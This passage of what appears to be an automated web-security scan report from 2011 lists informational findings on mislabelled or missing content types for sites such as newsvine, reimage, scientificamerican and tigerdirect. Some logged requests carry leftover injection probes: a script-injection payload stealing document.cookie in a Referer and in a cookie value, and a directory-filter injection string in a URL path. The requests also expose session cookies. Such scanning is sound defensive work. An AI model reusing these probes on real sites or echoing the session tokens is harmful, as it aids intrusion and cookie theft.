Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:03:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Length: 435
Content-Type: text/html; charset=UTF-8

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...

34.112. http://www.polls.newsvine.com/_vine/printer

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.polls.newsvine.com
Path:   /_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=www&path=/_vine/3c3db971ca91afcd)(sn=*/pierre HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:24:17 GMT
Connection: close
Content-Length: 479

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.polls.newsvine.com
...[SNIP]...

34.113. http://www.reimage.com/images/reimage.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reimage.com
Path:   /images/reimage.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/reimage.ico HTTP/1.1
Host: www.reimage.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tr00qdoq010dhkbjc6ke2ogs54; _language=english; _tracking=Neudesic69f18; _campaign=direct; _adgroup=direct; _keyword=direct; _ads=direct; _visit=1; _trackid=12484382; _visitnum=1; __utmz=243771526.1296350627.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; __utma=243771526.235665945.1296350627.1296350627.1296350627.1; __utmc=243771526; __utmb=243771526.2.10.1296350627

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:03 GMT
Server:
Last-Modified: Sun, 16 Jan 2011 16:36:12 GMT
Accept-Ranges: bytes
Content-Length: 894
Expires: Thu, 15 Apr 2045 20:00:00 GMT
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)lg.lg.lg.lg.lg.lg.lg.lg.lg..|L.~Nlg.lg.lg.
...[SNIP]...

34.114. http://www.reimage.com/lp/nhome/css/fonts/candelabook-webfont.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reimage.com
Path:   /lp/nhome/css/fonts/candelabook-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /lp/nhome/css/fonts/candelabook-webfont.woff HTTP/1.1
Host: www.reimage.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tr00qdoq010dhkbjc6ke2ogs54; _language=english; _tracking=Neudesic69f18; _campaign=direct; _adgroup=direct; _keyword=direct; _ads=direct; _visit=1; _trackid=12484382; _visitnum=1

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:28:54 GMT
Server:
Last-Modified: Sun, 23 Jan 2011 13:03:07 GMT
Accept-Ranges: bytes
Content-Length: 30632
Content-Type: text/plain; charset=UTF-8

wOFF......w.................................FFTM............X..qGDEF........... ....GPOS.......#........GSUB....... ... l.t.OS/2.......T...`e5..cmap...h...z......A.cvt ......."..."...Jfpgm...........e
...[SNIP]...

34.115. http://www.scientificamerican.com/assets/fonts/3739f210-118f-4d28-be3f-86746b0e6aa8-3

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scientificamerican.com
Path:   /assets/fonts/3739f210-118f-4d28-be3f-86746b0e6aa8-3

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /assets/fonts/3739f210-118f-4d28-be3f-86746b0e6aa8-3 HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 22 Sep 2010 01:39:07 GMT
ETag: "12e0315-6180-490cf3617c4c0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 24960
Date: Sun, 30 Jan 2011 17:14:48 GMT
X-Varnish: 1916371465 1916363808
Age: 252
Via: 1.1 varnish
Connection: keep-alive

wOFF......a..............._.................GPOS...X..%...iX=.iOS/2..&....Y...`~.eWcmap..'X...4..../...cvt ..(....H......
.fpgm..(....7....s.#.gasp..-.............glyf..-...*...K....Ahead..W....6...6
...[SNIP]...

34.116. http://www.scientificamerican.com/assets/fonts/53a8cf2e-6421-4292-852f-a282ba53459d-3

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scientificamerican.com
Path:   /assets/fonts/53a8cf2e-6421-4292-852f-a282ba53459d-3

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /assets/fonts/53a8cf2e-6421-4292-852f-a282ba53459d-3 HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 22 Sep 2010 01:39:07 GMT
ETag: "79100e-d0cd-490cf3617c4c0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 53453
Date: Sun, 30 Jan 2011 17:14:48 GMT
X-Varnish: 1916371472 1916363661
Age: 256
Via: 1.1 varnish
Connection: keep-alive

wOFF.......................(................GPOS..........DfC.w.GSUB..........    ..`^tLTSH...x.......:....OS/2.......V...`~...VDMX...T...t....l.t.cmap.......r.......bcvt ..!<..........    .fpgm..!X.......s
...[SNIP]...

34.117. http://www.scientificamerican.com/assets/fonts/bf15443a-6bf6-4af1-8887-d46d68cbb4b6-3

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scientificamerican.com
Path:   /assets/fonts/bf15443a-6bf6-4af1-8887-d46d68cbb4b6-3

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /assets/fonts/bf15443a-6bf6-4af1-8887-d46d68cbb4b6-3 HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 22 Sep 2010 01:39:07 GMT
ETag: "791009-6614-490cf3617c4c0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 26132
Date: Sun, 30 Jan 2011 12:28:09 GMT
X-Varnish: 462261573 462254861
Age: 241
Via: 1.1 varnish
Connection: keep-alive

wOFF......f...............dd................GPOS...X..*P..u....cOS/2..+....Y...`}-fOcmap..,....4..../...cvt ..-8...K......
.fpgm..-....7....s.#.gasp..1.............glyf..1...*...LP..L4head..\....6...6
...[SNIP]...

34.118. http://www.scout.com/webproxy.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scout.com
Path:   /webproxy.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /webproxy.ashx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:36 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50

The 'URL' query string parameter must be supplied.

34.119. http://www.silverlight.net/resources/script/omniture/analyticsid.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.silverlight.net
Path:   /resources/script/omniture/analyticsid.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /resources/script/omniture/analyticsid.aspx HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:08 GMT
Content-Length: 67

<!--
gAnalyticsId="b9c4f797-281a-4a6b-b1ac-aadc45678f4a";
// -->

34.120. http://www.tigerdirect.com/secure/captcha/JpegImage.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /secure/captcha/JpegImage.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg; charset=utf-8

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /secure/captcha/JpegImage.aspx HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/secure/captcha/Default.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SSLB=0; SRCCODE=WEB1101; SRVR=WEBX12%2D06B; ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: image/jpeg; charset=utf-8
Content-Length: 7487
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......d...."..............................
...[SNIP]...

34.121. http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR/1999/REC-html401-19991224/strict.dtd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/1999/REC-html401-19991224/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:25:54 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=31536000
Expires: Sun, 29 Jan 2012 23:25:54 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...

34.122. http://www.w3.org/TR/html4/strict.dtd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR/html4/strict.dtd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:40:26 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=7776000
Expires: Fri, 29 Apr 2011 23:40:26 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...

34.123. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR/xhtml1/DTD/xhtml1-strict.dtd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/xhtml1/DTD/xhtml1-strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:56:14 GMT
Server: Apache/2
Content-Location: xhtml1-strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Thu, 01 Aug 2002 13:56:03 GMT
ETag: "6380-3a726d58522c0;475d1b7e9a540"
Accept-Ranges: bytes
Content-Length: 25472
Cache-Control: max-age=7776000
Expires: Fri, 29 Apr 2011 23:56:14 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
Extensible HTML version 1.0 Strict DTD

This is the same as HTML 4 Strict except for
changes due to the differences between XML and SGML.

Namespace = http://www.w3.org/1999/xhtml


...[SNIP]...

35. Content type is not specified
There are 5 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


35.1. http://l.player.ooyala.com/errors/report

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.player.ooyala.com
Path:   /errors/report

Request

GET /errors/report?log=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&ts=1296402006 HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sun, 30 Jan 2011 15:39:12 GMT
Content-Length: 2
Connection: close
Expires: Sun, 30 Jan 2011 15:39:11 GMT
Cache-Control: no-cache

OK

35.2. http://l.player.ooyala.com/verify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.player.ooyala.com
Path:   /verify

Request

POST /verify?ts=1296391797455 HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
x-verify: 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&sig=f3wqn8exCAHzpdeN5179
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1

.

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sun, 30 Jan 2011 12:49:02 GMT
Content-Length: 2
Connection: close
Expires: Sun, 30 Jan 2011 12:49:01 GMT
Cache-Control: no-cache

OK

35.3. https://login.live.com/hiphelp.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /hiphelp.srf

Request

GET /hiphelp.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H54 V: 0
Date: Sat, 29 Jan 2011 23:13:20 GMT
Connection: close

404 Not Found

35.4. http://news.ycombinator.com/newest

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.ycombinator.com
Path:   /newest

Request

GET /newest HTTP/1.1
Host: news.ycombinator.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response


<html><head><link rel="stylesheet" type="text/css" href="http://ycombinator.com/news.css">
<link rel="shortcut icon" href="http://ycombinator.com/favicon.ico">
<script>
function byId(id) {
return document.getElementById(id);
}

function vote(node) {
var v = node.id.split(/_/); // {'up', '123'}
var item = v[1];

// adjust score
var score = byId('score_' + item);
var newscore = parseInt(score.innerHTML) + (v[0] ==
...[SNIP]...

35.5. http://news.ycombinator.com/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.ycombinator.com
Path:   /news

Request

GET /news HTTP/1.1
Host: news.ycombinator.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response


<html><head><link rel="stylesheet" type="text/css" href="http://ycombinator.com/news.css">
<link rel="shortcut icon" href="http://ycombinator.com/favicon.ico">
<script>
function byId(id) {
return document.getElementById(id);
}

function vote(node) {
var v = node.id.split(/_/); // {'up', '123'}
var item = v[1];

// adjust score
var score = byId('score_' + item);
var newscore = parseInt(score.innerHTML) + (v[0] ==
...[SNIP]...
